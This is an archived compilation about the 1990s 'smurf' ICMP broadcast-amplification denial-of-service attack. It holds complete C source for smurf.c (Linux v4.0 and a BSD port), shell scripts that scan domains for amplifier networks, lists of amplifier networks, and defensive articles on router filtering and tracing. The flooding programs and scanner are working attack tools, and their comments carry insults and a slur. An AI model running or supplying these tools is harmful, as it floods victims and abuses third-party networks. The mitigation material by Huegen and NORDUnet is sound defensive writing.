it and b) it would have such a destructive effect on the computers being used to flood. My ignorance is my mistake. I extremely regret writing this, but as you well know, if things aren't `exploited' then they aren't fixed. Now that that's cleared up, how do you protect your network? Well, unfortunatly I am not sure how or even if it is possible to protect yourself from being hit with it, unless you wanted to deny all incoming icmp traffic at the router which isn't the best solution as it renders other useful oddities (such as ping and traceroute) unusable. To prevent your network from being used to flood (using up almost all your bandwith therefore creating a denial of service upon yourself.. technically) is quite easy and not a great loss to your network. If you filter all incoming icmp traffic to the broadcast address at the router none of the machines will respond therefore the attack will not work. This can be done with one line in the router, and I believe a rep from texas.net posted the solution for this (perhaps it could be reposted?). I believe MCI is currently working on a patch or dectector of some kind for it, which is available at http://www.internetnews.com/isp-news/1997/10/0901-mci.html Please, patch your networks, if there's nothing to flood with then there's no flood. Respectfully, TFreak --- 8< smurf4.c >8 --- /* * * $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $ * * spoofs icmp packets from a host to various broadcast addresses resulting * in multiple replies to that host from a single packet. * * mad head to: * nyt, soldier, autopsy, legendnet, #c0de, irq for being my guinea pig, * MissSatan for swallowing, napster for pimping my sister, the guy that * invented vaseline, fyber for trying, knowy, old school #havok, kain * cos he rox my sox, zuez, toxik, robocod, and everyone else that i might * have missed (you know who you are). * * hi to pbug, majikal, white_dragon and chris@unix.org for being the sexy * thing he is (he's -almost- as stubborn as me, still i managed to pick up * half the cheque). * * and a special hi to Todd, face it dude, you're fucking awesome. * * mad anal to: * #madcrew/#conflict for not cashing in their cluepons, EFnet IRCOps * because they plain suck, Rolex for being a twit, everyone that * trades warez, Caren for being a lesbian hoe, AcidKill for being her * partner, #cha0s, sedriss for having an ego in inverse proportion to * his penis and anyone that can't pee standing up -- you don't know what * your missing out on. * * and anyone thats ripped my code (diff smurf.c axcast.c is rather * interesting). * * and a HUGE TWICE THE SIZE OF SOLDIER'S FUCK TO AMM FUCK YOU to Bill * Robbins for trying to steal my girlfriend. Not only did you show me * no respect but you're a manipulating prick who tried to take away the * most important thing in the world to me with no guilt whatsoever, and * for that I wish you nothing but pain. Die. * * disclaimer: * I cannot and will not be held responsible nor legally bound for the * malicious activities of individuals who come into possession of this * program and I refuse to provide help or support of any kind and do NOT * condone use of this program to deny service to anyone or any machine. * This is for educational use only. Please Don't abuse this. * * Well, i really, really, hate this code, but yet here I am creating another * disgusting version of it. Odd, indeed. So why did I write it? Well, I, * like most programmers don't like seeing bugs in their code. I saw a few * things that should have been done better or needed fixing so I fixed * them. -shrug-, programming for me as always seemed to take the pain away * ... * * */ #include #include #include #include #include #include #include #include #include #include #include #include #include void banner(void); void usage(char *); void smurf(int, struct sockaddr_in, u_long, int); void ctrlc(int); unsigned short in_chksum(u_short *, int); /* stamp */ char id[] = "$Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $"; int main (int argc, char *argv[]) { struct sockaddr_in sin; struct hostent *he; FILE *bcastfile; int i, sock, bcast, delay, num, pktsize, cycle = 0, x; char buf[32], **bcastaddr = malloc(8192); banner(); signal(SIGINT, ctrlc); if (argc < 6) usage(argv[0]); if ((he = gethostbyname(argv[1])) == NULL) { perror("resolving source host"); exit(-1); } memcpy((caddr_t)&sin.sin_addr, he->h_addr, he->h_length); sin.sin_family = AF_INET; sin.sin_port = htons(0); num = atoi(argv[3]); delay = atoi(argv[4]); pktsize = atoi(argv[5]); if ((bcastfile = fopen(argv[2], "r")) == NULL) { perror("opening bcast file"); exit(-1); } x = 0; while (!feof(bcastfile)) { fgets(buf, 32, bcastfile); if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0])) continue; for (i = 0; i < strlen(buf); i++) if (buf[i] == '\n') buf[i] = '\0'; bcastaddr[x] = malloc(32); strcpy(bcastaddr[x], buf); x++; } bcastaddr[x] = 0x0; fclose(bcastfile); if (x == 0) { fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]); exit(-1); } if (pktsize > 1024) { fprintf(stderr, "ERROR: packet size must be < 1024\n\n"); exit(-1); } if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("getting socket"); exit(-1); } setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *)&bcast, sizeof(bcast)); printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]); for (i = 0; i < num || !num; i++) { if (!(i % 25)) { printf("."); fflush(stdout); } smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize); cycle++; if (bcastaddr[cycle] == 0x0) cycle = 0; usleep(delay); } puts("\n\n"); return 0; } void banner (void) { puts("\nsmurf.c v4.0 by TFreak\n"); } void usage (char *prog) { fprintf(stderr, "usage: %s " " \n\n" "target = address to hit\n" "bcast file = file to read broadcast addresses from\n" "num packets = number of packets to send (0 = flood)\n" "packet delay = wait between each packet (in ms)\n" "packet size = size of packet (< 1024)\n\n", prog); exit(-1); } void smurf (int sock, struct sockaddr_in sin, u_long dest, int psize) { struct iphdr *ip; struct icmphdr *icmp; char *packet; packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize); ip = (struct iphdr *)packet; icmp = (struct icmphdr *) (packet + sizeof(struct iphdr)); memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize); ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize); ip->ihl = 5; ip->version = 4; ip->ttl = 255; ip->tos = 0; ip->frag_off = 0; ip->protocol = IPPROTO_ICMP; ip->saddr = sin.sin_addr.s_addr; ip->daddr = dest; ip->check = in_chksum((u_short *)ip, sizeof(struct iphdr)); icmp->type = 8; icmp->code = 0; icmp->checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psize); sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)); free(packet); /* free willy! */ } void ctrlc (int ignored) { puts("\nDone!\n"); exit(1); } unsigned short in_chksum (u_short *addr, int len) { register int nleft = len; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *addr++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)addr; sum += answer; } sum = (sum >> 16) + (sum + 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } -------------------------------------------------------------------------------- Along these same lines, Craig Huegen has written up some documentation that gives an in depth explination of smurfing and prevention measures at http://www.quadrunner.com/~c-huegen/smurf.txt From the web page: --------------------------------------------------- THE LATEST IN DENIAL OF SERVICE ATTACKS: "SMURFING" DESCRIPTION AND INFORMATION TO MINIMIZE EFFECTS Craig A. Huegen chuegen@quadrunner.com Last Update: Fri Oct 10 12:20 PDT New additions: * More minor corrections * Added MCI's DoSTracker program (announced at N+I 10/9/97) * Changed "helpers" to "bounce sites" (kcooper@bbnplanet.com) * Added preliminary information about Bay Networks routers (jcgreen@netins.net) * Added further information about Proteon/OpenROUTE routers (dts@senie.com) Editor's plea: *please* distribute this information freely, and abide by my redistribution requirements (see the very end) when doing so. It's important that these attacks be minimized, and communication is the only way to help with this. OVERVIEW: The information here provides in-depth information regarding "smurf" attacks, with a focus on Cisco routers and how to reduce the effects of the attack. Some information is general and not related to an organization's particular vendor of choice; however, it is written with a Cisco router focus. No confirmation has been made to the effects on other vendors' equipment; however, others have provided me with information for various vendors, which is provided in the document. See the "Acknowledgements" section below for the sources and contact information. I am happy to accept information from other colleagues who are willing to provide information about other vendors' products in relation to this topic. This paper is always being updated as I receive more information about attacks and work with ways to minimize impact. DESCRIPTION: The "smurf" attack, named after its exploit program, is the most recent in the category of network-level attacks against hosts. A perpetrator sends a large amount of ICMP echo (ping) traffic at broadcast addresses, all of it having a spoofed source address of a victim. If the routing device delivering traffic to those broadcast addresses performs the IP broadcast to layer 2 broadcast function noted below, most hosts on that IP network will take the ICMP echo request and reply to it with an echo reply each, multiplying the traffic by the number of hosts responding. On a multi-access broadcast network, there could potentially be hundreds of machines to reply to each packet. Currently, the providers/machines most commonly hit are IRC servers and their providers. There are two parties who are hurt by this attack... the intermediary (broadcast) devices--let's call them "bounce sites", and the spoofed address target, or the "victim". The victim is the target of a large amount of traffic that the bounce sites generate. Let's look at the scenario to paint a picture of the dangerous nature of this attack. Assume a co-location switched network with 100 hosts, and that the attacker has a T1. The attacker sends, say, a 768kb/s stream of ICMP echo (ping) packets, with a spoofed source address of the victim, to the broadcast address of the "bounce site". These ping packets hit the bounce site's broadcast network of 100 hosts; each of them takes the packet and responds to it, creating 100 ping replies outbound. If you multiply the bandwidth, you'll see that 76.8 Mbps is used outbound from the "bounce site" after the traffic is multiplied. This is then sent to the victim (the spoofed source of the originating packets). HOW TO KEEP YOUR SITE FROM BEING THE SOURCE PERPETRATORS USE TO ATTACK VICTIMS: The perpetrators of these attacks rely on the ability to source spoofed packets to the "bounce sites" in order to generate the traffic which causes the denial of service. In order to stop this, all networks should perform filtering either at the edge of the network where customers connect (access layer) or at the edge of the network with connections to the upstream providers. Paul Ferguson of cisco Systems and Daniel Senie of Daniel Senie consulting have written an Internet-draft pertaining to this topic. See: ftp://ftp.internic.net/internet-drafts/draft-ferguson-ingress-filtering-02.txt for more information on this subject. The authors expect to have it published as an Informational RFC prior to the December IETF meeting. HOW TO STOP BEING AN INTERMEDIARY: This attack relies on the router serving a large multi-access broadcast network to frame an IP broadcast address (such as 10.255.255.255) into a layer 2 broadcast frame (for Ethernet, FF:FF:FF:FF:FF:FF). The RFC for routing states that a router MAY perform this translation for directed broadcasts. Because in a few select cases it is desirable, and it hasn't been proved undesirable (except in the recent DoS attacks), most vendors have chosen to implement this behavior. Generally, with IP providers and the Internet as we know it today, this behavior should not be needed. (Editor's note: I welcome other examples where this is needed in today's networking--see below for a single example I know of.) Ethernet NIC hardware (MAC-layer hardware, specifically) will only listen to a select number of addresses in normal operation. The one MAC address that all devices share in common in normal operation is the media broadcast, or FF:FF:FF:FF:FF:FF. In this case, a device will take the packet and send an interrupt for processing. Because most host IP stacks pay little attention to the destination address in the IP header of an ICMP packet, or (if they check the IP header for ICMP) implement responding to ICMP broadcasts, the packet is handed to the ICMP layer, where in the case of smurf attacks, an ICMP echo reply is prepared and shipped out to the spoofed address source of the packet-- the victim. To stop your Cisco router from converting these layer 3 broadcasts into layer 2 broadcasts, use the "no ip directed-broadcast" interface configuration command. This should be configured on all routers which provide routing to large multi-access broadcast networks (generally LANs), with more than 5-10 devices. It is unnecessary on point-to-point interfaces, such as POS, serial T1, HSSI, etc., because point-to-point interfaces will only generate two replies--one for each end of the link. No testing has been done on multipoint frame-relay; routers on NBMA networks typically do not forward broadcasts unless explicitly configured to do so. Point-to-point sub-interface models will behave like many point-to-point links--again, this command will have little effect, stopping only one of the two replies. Other vendor information: * Proteon/OpenROUTE: Daniel Senie (dts@senie.com) reports that Proteon/OpenROUTE Networks routers have an option to turn off directed broadcasts in the IP Configuration menus. The command sequence to turn them off is: *CONFIG (on newer routers) or TALK 6 (on older routers) Config>PROTOCOL IP IP Config>DISABLE DIRECTED-BROADCAST A restart of the router is then required. * Bay Networks: Jon Green (jcgreen@netins.net) reports that under current code, there is no way to keep Bay Networks routers from converting layer 3 broadcasts to layer 2 broadcasts short of applying a per-interface filter, eliminating packets to the broadcast. However, there is a feature request to add a configuration option, and it is expected to be in BayRS version 12.0. There is one case study where this will stop intended behavior: In the case where samba (an SMB server for UNIX) or NT is used to "remote broadcast" into a LAN workgroup so that the workstations on that LAN can see the server, this will prevent the LAN machines from seeing the remote server. This is *only* in the case where there is no WINS server (WINS is routed unicast) and a "remote broadcast" is being used--it's a rare but notable condition. INFORMATION FOR VICTIMS AND HOW TO SUPPRESS ATTACKS: The amount of bandwidth and packets per second (pps) that can be generated by this attack is quite large. With a 200-host LAN, I was able to generate over 80 Mbits/sec traffic at around 35 Kpps toward my target--a pretty significant amount. The victims receive this because traffic is multiplied by the number of hosts on the broadcast network used (in this case, with a 200-host network, I was only required to send 400 Kbits/sec to the broadcast address--less than one-third of a T1). Many hosts cannot process this many packets per second; many hosts are connected to 10 Mbit/sec Ethernet LANs where more traffic than wire speed is sent. Therefore, the ability to drop these packets at the network border, or even before it flows down the ingress pipes, is desired. (This next section assumes IOS behavior with standard central switching-- FIB/CEF isn't covered here, the behavior is different, I believe.) Cisco routers have several "paths" which packets can take to be routed; each has a varying degree of overhead. The slowest of these is "process" switching. This is used when a complex task is required for processing packets. The other modes are variations of a fast path--each of them with a set of advantages and disadvantages. However, they're all handled at interrupt level (no process-level time is required to push these packets). In IOS versions (even the most recent), access-list denies are handled at the process (slow) level, because they require an ICMP unreachable to be generated to the originating host. All packets were sent to the process level automatically to be handled this way. Under a recent code change (Cisco bug ID CSCdj35407--integrated in version 11.1(14)CA and later), packets denied by an access-list will be dropped at the interrupt (fast) level, with the exception of 2 packets per second per access-list deny line. These 2 packets per second will be used to send the "ICMP unreachable via administrative block" messages. This assumes that you don't want to log the access-list violations (via the "log" or "log-input" keywords). The ability to rate-limit "log-input" access-list lines (in order to more easily log these packets) is currently being integrated; see the section below on tracing spoofed packet attacks for information on logging. Filtering ICMP echo reply packets destined for your high-profile machines at the ingress interfaces of the network border routers will then permit the packets to be dropped at the earliest possible point. However, it does not mean that the network access pipes won't fill, as the packets will still come down the pipe to be dropped at the router. It will, however, take the load off the system being attacked. Keep in mind that this also denies others from being able to ping from that machine (the replies will never reach the machine). For those customers of providers who use Cisco, this may give you some leverage with the providers' security teams to help save your pipes by filtering before the traffic is sent to you. Efforts are underway to integrate these fixes in the other major versions and branches as well. TRACING SPOOFED PACKET STREAMS: Tracking these attacks can prove to be difficult, but is possible with coordination and cooperation from providers. This section also assumes Cisco routers, because I can speak only about the abilities of Cisco to log/filter packets and what impact it may have. Today, logging packets which pass through or get dropped in an ACL is possible; however, all packets with the "log" or "log-input" ACL options are sent to process level for logging. For a large stream of packets, this could cause excessive CPU problems. For this reason, tracking attacks via IOS logging today is limited to either lower bandwidth attacks (smaller than 10k packets per second). Even then, the number of log messages generated by the router could overload a syslog server. Cisco bug ID CSCdj35856 addresses this problem. It has been integrated into IOS version 11.1CA releases beginning with 11.1(14.1)CA (a maintenance interim release), and makes it possible to log packets at defined intervals and to process logged packets not at that interval in the fast path. I will update this page with version numbers as the releases are integrated. Some information on logging: In later 11.1 versions, a new keyword was introduced for ACL logging: "log-input". A formatted ACL line utilizing the keyword looks like this: access-list 101 permit icmp any any echo log-input When applied to an interface, this line will log all ICMP ping packets with input interface and MAC address (for multi-access networks). Point-to-point interfaces will not have a MAC address listed. Here's an example of the log entry for a multi-access network (FDDI, Ether): Sep 10 23:17:01 PDT: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp 10.0.7.30 (FastEthernet1/0 0060.3e2f.6e41) -> 10.30.248.3 (8/0), 5 packets Here's an example of the log entry for a point-to-point network: Sep 10 23:29:00 PDT: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp 10.0.7.30 (BRI0 *PPP*) -> 10.0.19.242 (8/0), 1 packet Substituting "log" for "log-input" will eliminate the incoming interface and MAC address from the log messages. We'll use the first log entry to demonstrate how to go from here. This log entry means the packet came in on FastEthernet1/0, from MAC address 0060.3e2f.6e41, destined for 10.30.248.3. From here, you can use "show ip arp" (if needed) to determine the IP address for the MAC address, and go to the next hop for tracing or contact the necessary peer (in the case of an exchange point). This is a hop-by-hop tracing method. Example of "show ip arp" used to find next hop: netlab#show ip arp 0060.3e2f.6e41 Protocol Address Age (min) Hardware Addr Type Interface Internet 10.0.183.65 32 0060.3e2f.6e41 ARPA FastEthernet1/0 As you can see, 10.0.183.65 is the next hop where the packets came from and we should go there to continue the tracing process, utilizing the same ACL method. By doing this, you can track the spoof attack backwards. While this is general information on tracking spoofed packets, it must be noted that the victims of a smurf attack get packets from the listed source in the packets; i.e., they receive echo-reply packets truly from the source listed in the IP header. This information should be used by the bounce sites or intermediaries to track the spoofed echo _request_ packets back to their source (the perpetrator). MCI's Internet Security team has put together a perl script which, in an automated fashion, can log into your Cisco routers and trace a spoof attack back to its source. The program is available, free of charge. See http://www.security.mci.net/dostracker/ for more information. OTHER DENIAL OF SERVICE ATTACKS WORTHY OF MENTION: Two other denial of service attacks frequently encountered are TCP SYN floods, and UDP floods aimed at diagnostic ports on hosts. TCP SYN attacks consist of a large number of spoofed TCP connection set-up messages aimed at a particular service on a host. Older TCP implementations cannot handle many faked connection set-up packets, and will not allow access to the victim service. The most common form of UDP flooding directed at harming networks is an attack consisting of a large number of spoofed UDP packets aimed at diagnostic ports on network devices. This attack is also known as the "pepsi" attack (again named after the exploit program), and can cause network devices to use up a large amount of CPU time responding to these packets. To get more information on minimizing the effects of these two attacks, see: Defining Strategies to Protect Against TCP SYN Denial of Service Attacks http://cio.cisco.com/warp/public/707/4.html Defining Strategies to Protect Against UDP Diagnostic Port DoS Attacks http://cio.cisco.com/warp/public/707/3.html PERFORMANCE INFORMATION: One ISP has reported that, spread across three routers (2 RSP2 and 1 RSP4), the fast drop code eliminated a sustained 120 Mbits/sec smurf attack and kept the network running without performance problems. As always, your mileage may vary. ACKNOWLEDGEMENTS: Thanks to all those who helped review and provide input to the paper, as well as sanity checking. Specific thanks to: * Ravi Chandra of Cisco Systems for information on the bugfixes. * Daniel Senie of Daniel Senie Consulting, Jon Green of Bay Networks for information on other vendors' equipment. * Paul Ferguson of Cisco Systems, Kelly Cooper of GTE/BBN, Rob McMillan of CERT for sanity-check and review comments. Referenced documents: This section is coming soon. =) PERMISSION TO DUPLICATE: Permission to duplicate this information is granted under these terms: 1. My name and e-mail address remains on the information as a target for questions and identification of the source 2. My disclaimer appears on the information at the bottom 3. Feel free to add extra information from other discussions, etc., but please ensure the correct attribution is made to the author. Also provide Craig Huegen (chuegen@quadrunner.com) a copy of your additions. 4. Please help disseminate this information to other network administrators who are affected by these attacks. If you have questions, I will be happy to answer them to the best of my knowledge. MY DISCLAIMER: I'm speaking about this as an interested party only. All text in this paper was written by me; I speak/write for no one but myself. No vendors have officially confirmed/denied any of the information contained herein. All research for this paper is being done purely as a matter of self-interest and desire to help others minimize effects of this attack. Craig A. Huegen chuegen@quadrunner.com http://www.quadrunner.com/~chuegen/smurf.txt ---------------------------------------------------------------------------- T. Freak's posted his smurf code, and there's been a few messages concerning this d.o.s. attack -- I guess now is a good of a time as any to release this little script. I'm sure there's a more efficient way of putting something like this together, but... oh well. Results of the scan are reported into ./bips.results note: this script has two parts. --- bips.sh --- #!/bin/bash # find broadcast ip's that reply with 30+ dupes. # i decided to make this script into two sections. when running this make # sure both parts are in the same directory. if [ $# != 1 ]; then echo "$0 " else host -l $1 | grep 'has address' | cut -d' ' -f4 > $1.ips cat $1.ips | cut -d'.' -f1-3 | sort |\ awk '{ print echo ""$1".255" }' > $1.tmp cat $1.tmp | uniq | awk '{ print "./chekdup.sh "$1"" }' > $1.ping rm -f $1.ips $1.tmp chmod 700 $1.ping ./$1.ping rm $1.ping fi --- chekdup.sh --- #!/bin/bash # this checks possible broadcast ip's for a given amount of icmp echo # replies. ping -c 2 $1 > $1.out if cat $1.out | grep dupl > /dev/null then export DUPES="`cat $1.out | grep dupl | cut -d'+' -f2 | cut -d' ' -f1`" else export DUPES=1 fi if [ $DUPES -gt 30 ]; then echo "$1 had $DUPES dupes" >> bips.results rm -f $1.out else rm -f $1.out fi ------------------------------------------------------------------------------ Here is Tfreaks code ported to FreeBSD and whatever other operating systems use BSD style sockets. ---- smurf.c ---- /* * $Id smurf.c,v 5.0 1997/10/13 22:37:21 CDT griffin Exp $ * * spoofs icmp packets from a host to various broadcast addresses resulting in * multiple replies to that host from a single packet. * * orginial linux code by tfreak, most props to him, all I did was port it to * operating systems with a less perverse networking system, such as FreeBSD, * and many others. -Griffin * * mad head to: nyt, soldier, autopsy, legendnet, #c0de, irq for being my guinea * pig, MissSatan for swallowing, napster for pimping my sister, the guy that * invented vaseline, fyber for trying, knowy, old school #havok, kain cos he * rox my sox, zuez, toxik, robocod, and everyone else that i might have * missed (you know who you are). * * hi to pbug, majikal, white_dragon and chris@unix.org for being the sexy thing * he is (he's -almost- as stubborn as me, still i managed to pick up half * the cheque). * * and a special hi to Todd, face it dude, you're fucking awesome. * * mad anal to: #madcrew/#conflict for not cashing in their cluepons, EFnet * IRCOps because they plain suck, Rolex for being a twit, everyone that * trades warez, Caren for being a lesbian hoe, AcidKill for being her * partner, #cha0s, sedriss for having an ego in inverse proportion to his * penis and anyone that can't pee standing up -- you don't know what your * missing out on. * * and anyone thats ripped my code (diff smurf.c axcast.c is rather * interesting). * * and a HUGE TWICE THE SIZE OF SOLDIER'S FUCK TO AMM FUCK YOU to Bill Robbins * for trying to steal my girlfriend. Not only did you show me no respect * but you're a manipulating prick who tried to take away the most important * thing in the world to me with no guilt whatsoever, and for that I wish you * nothing but pain. Die. * * disclaimer: I cannot and will not be held responsible nor legally bound for * the malicious activities of individuals who come into possession of this * program and I refuse to provide help or support of any kind and do NOT * condone use of this program to deny service to anyone or any machine. This * is for educational use only. Please Don't abuse this. * * Well, i really, really, hate this code, but yet here I am creating another * disgusting version of it. Odd, indeed. So why did I write it? Well, I, * like most programmers don't like seeing bugs in their code. I saw a few * things that should have been done better or needed fixing so I fixed them. * -shrug-, programming for me as always seemed to take the pain away ... * * */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include void banner(void); void usage(char *); void smurf(int, struct sockaddr_in, u_long, int); void ctrlc(int); unsigned int host2ip(char *hostname); unsigned short in_chksum(u_short *, int); unsigned int host2ip(char *hostname) { static struct in_addr i; struct hostent *h; i.s_addr = inet_addr(hostname); if (i.s_addr == -1) { h = gethostbyname(hostname); if (h == NULL) { fprintf(stderr, "can't find %s\n.", hostname); exit(0); } bcopy(h->h_addr, (char *) &i.s_addr, h->h_length); } return i.s_addr; } /* stamp */ char id[] = "$Id smurf.c,v 5.0 1997/10/13 22:37:21 CDT griffin Exp $"; int main(int argc, char *argv[]) { struct sockaddr_in sin; FILE *bcastfile; int i, sock, bcast, delay, num, pktsize, cycle = 0, x; char buf[32], **bcastaddr = malloc(8192); banner(); signal(SIGINT, ctrlc); if (argc < 6) usage(argv[0]); sin.sin_addr.s_addr = host2ip(argv[1]); sin.sin_family = AF_INET; num = atoi(argv[3]); delay = atoi(argv[4]); pktsize = atoi(argv[5]); if ((bcastfile = fopen(argv[2], "r")) == NULL) { perror("opening bcast file"); exit(-1); } x = 0; while (!feof(bcastfile)) { fgets(buf, 32, bcastfile); if (buf[0] == '#' || buf[0] == '\n' || !isdigit(buf[0])) continue; for (i = 0; i < strlen(buf); i++) if (buf[i] == '\n') buf[i] = '\0'; bcastaddr[x] = malloc(32); strcpy(bcastaddr[x], buf); x++; } bcastaddr[x] = 0x0; fclose(bcastfile); if (x == 0) { fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]); exit(-1); } if (pktsize > 1024) { fprintf(stderr, "ERROR: packet size must be < 1024\n\n"); exit(-1); } if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("getting socket"); exit(-1); } setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *) &bcast, sizeof(bcast)); printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]); for (i = 0; i < num || !num; i++) { if (!(i % 25)) { printf("."); fflush(stdout); } smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize); cycle++; if (bcastaddr[cycle] == 0x0) cycle = 0; usleep(delay); } puts("\n\n"); return 0; } void banner(void) { puts("\nsmurf.c v5.0 by TFreak, ported by Griffin\n"); } void usage(char *prog) { fprintf(stderr, "usage: %s " " \n\n" "target = address to hit\n" "bcast file = file to read broadcast addresses from\n" "num packets = number of packets to send (0 = flood)\n" "packet delay = wait between each packet (in ms)\n" "packet size = size of packet (< 1024)\n\n", prog); exit(-1); } void smurf(int sock, struct sockaddr_in sin, u_long dest, int psize) { struct ip *ip; struct icmp *icmp; char *packet; int hincl = 1; packet = malloc(sizeof(struct ip) + sizeof(struct icmp) + psize); ip = (struct ip *) packet; icmp = (struct icmp *) (packet + sizeof(struct ip)); memset(packet, 0, sizeof(struct ip) + sizeof(struct icmp) + psize); setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &hincl, sizeof(hincl)); ip->ip_len = sizeof(struct ip) + sizeof(struct icmp) + psize; ip->ip_hl = sizeof *ip >> 2; ip->ip_v = 4; ip->ip_ttl = 255; ip->ip_tos = 0; ip->ip_off = 0; ip->ip_id = htons(getpid()); ip->ip_p = 1; ip->ip_src.s_addr = sin.sin_addr.s_addr; ip->ip_dst.s_addr = dest; ip->ip_sum = 0; icmp->icmp_type = 8; icmp->icmp_code = 0; icmp->icmp_cksum = htons(~(ICMP_ECHO << 8)); sendto(sock, packet, sizeof(struct ip) + sizeof(struct icmp) + psize, 0, (struct sockaddr *) & sin, sizeof(struct sockaddr)); free(packet); /* free willy! */ } void ctrlc(int ignored) { puts("\nDone!\n"); exit(1); } unsigned short in_chksum(u_short * addr, int len) { register int nleft = len; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *addr++; nleft -= 2; } if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) addr; sum += answer; } sum = (sum >> 16) + (sum + 0xffff); sum += (sum >> 16); answer = ~sum; return (answer); } --- end --- Preventing Smurf Attacks ~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.nordu.net/articles/smurf.html Introduction This brief introduction to the denial-of-service attacks of the SMURF type (named after the program used to instigate the attack) explains what they are and what can be done about them. In a SMURF attack you can be affected in one of several ways: As a victim or target of the attack As a network which is abused to amplify the attack As a party harboring the instigator of the attack SMURF and similar Denial-of-service (DoS) attacks can do serious damage to your network services, be it either as an individual end-user or as an entire institution in that your network or host can be inundated with unwanted and maliciously sent traffic. Anatomy of a SMURF Attack A SMURF attack (named after the program used to perform the attack) is a method by which an attacker can send a moderate amount of traffic and cause a virtual explosion of traffic at the intended target. The method used is as follows: The attacker sends ICMP Echo Request packets where the source IP address has been forged to be that of the target of the attack. The attacker sends these ICMP datagrams to addresses of remote LANs broadcast addresses, using so-called directed broadcast addresses. These datagrams are thus broadcast out on the LANs by the connected router. All the hosts which are «alive» on the LAN each pick up a copy of the ICMP Echo Request datagram (as they should), and sends an ICMP Echo Reply datagram back to what they think is the source. If many hosts are «alive» on the LAN, the amplification factor can be considerably (100+ is not uncommon). The attacker can use largish packets (typically up to ethernet maximum) to increase the «effectiveness» of the attack, and the faster network connection the attacker has, the more damage he can inflict on the target and the target's network. Not only can the attacker cause problems for the target host, the influx of traffic can in fact be so great as to have a seriously negative effect on the upstream network(s) from the target. In fact, those institutions being abused as amplifier networks can also be similarly affected, in that their network connection can be swamped by the Echo Reply packets destined for the target. Preventing SMURF attacks PROPERLY CONFIGURED NETWORK EQUIPMENT IS THE KEY The availability of the directed broadcast function is an important element in these attacks. The current Proposed Standard for "Requirements for IP Version 4 Routers" (RFC1812) states that a router must default to forwarding directed broadcasts, that a knob must exist to turn it off, but it must default to the «on» position (see section 5.3.5.2 of RFC1812). However, the current sentiment is that this should no longer be a requirement. Thus, to prevent your network from being abused as an amplifier network in a SMURF attack, you should turn off the forwarding of directed broadcast on all router ports or take other measures to assure your network cannot be abused in this manner. Another component which is important in this type of attack is that the attacker has to be able to inject packets into the network with forged IP source addresses. It is possible to enable functions in routers which will prevent the trivial forgery of IP source addresses, and doing so for a local network will prevent SMURF attacks from being launched locally. (Do however note that access lists can have a performance impact, so judicious use of such tools is advised.) This sort of ingress filtering has been documented in RFC2267, and is effective not only for preventing local origination of SMURF attacks, and also makes tracking attacks (or denying origination of attacks) much easier. Since SMURF attacks use forged source addresses, tracking SMURF attacks back to their source can be a challenge. It has to be done while the attack is ongoing, and requires the swift cooperation of all the network service providers along the path. In practice this has proven to be quite difficult. Instead, what we have done in NORDUnet is to set a rate-limit on the volume of ICMP Echo Reply traffic we allow into NORDUnet. This is so that we can «soften» the effect of an attack originated outside of NORDUnet directed at a host inside NORDUnet. For more detailed instructions as to how to take precautionary measures see Craig A. Huegen's page describing SMURF attacks. There is also an informal SMURF Amplifier Registry housed by the norwegian ISP PowerTech, which in the form of a «hall of shame» lists active amplifier networks. It might be a good idea to check that your network is not on this list. http://netscan.org/lamers-r-us.html - Lists the current 2048 top smurf amplifiers, sample list below And the following information: Current top ten smurf amplifiers (updated every 5 minutes) (last update: 1999-08-04 20:31:03 CET) Network #Dups #Incidents Registered at Home AS 208.248.240.0/24 123 0 1999-07-31 22:49 not-analyzed 208.239.162.0/24 97 0 1999-07-28 00:15 not-analyzed 208.6.8.0/24 93 0 1999-07-28 00:34 not-analyzed 208.166.201.0/24 89 0 1999-01-19 07:13 AS4181 4.5.255.0/24 79 0 1999-07-14 12:35 not-analyzed 204.96.225.0/24 73 0 1998-06-22 17:46 AS3594 192.0.0.0/2 73 0 1999-01-04 06:39 not-analyzed 128.0.0.0/1 73 0 1999-01-28 02:36 not-analyzed 209.0.233.0/24 73 0 1999-04-28 23:45 AS3356 194.170.181.0/24 72 0 1998-10-24 09:42 AS5384 110536 networks have been probed with the SAR 19684 of them are currently broken 13338 have been fixed after being listed here comes from a Norwegian site, http://www.powertech.no/smurf/ Smurf Amplifier List (Is your network on this list??) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://netscan.org/lamers-r-us.html Note that it's also possible to see the # of replies for any network. Head to the main page and punch in an IP. Last rescan: Wed Jul 14 20:00:57 EDT 1999 RESP ADDR EMAIL ADDRESSES --------------------------------------------------------------------- 141239 24.48.37.255 hostmaster@adelphia.net 47509 24.131.12.255 help@mediaone.net 10525 208.213.139.255 nick@sunbrokerage.com 2991 209.112.24.255 mike@sentex.net 805 192.114.6.0 hank@isoc.org.il 728 194.235.65.0 coen@microhill.nl, jasper@webcity.nl 690 